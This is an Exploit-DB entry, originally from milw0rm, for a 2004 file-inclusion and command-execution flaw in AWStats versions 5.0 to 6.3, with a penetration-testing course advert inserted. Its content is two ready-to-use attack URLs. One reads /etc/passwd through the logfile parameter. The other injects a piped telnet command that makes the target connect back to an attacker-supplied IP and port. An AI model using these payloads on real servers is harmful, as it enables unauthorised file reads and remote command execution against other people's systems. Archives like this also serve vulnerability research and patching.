AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution

EDB-ID:

407

CVE:





Platform:

CGI

Date:

2004-08-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>


# milw0rm.com [2004-08-21]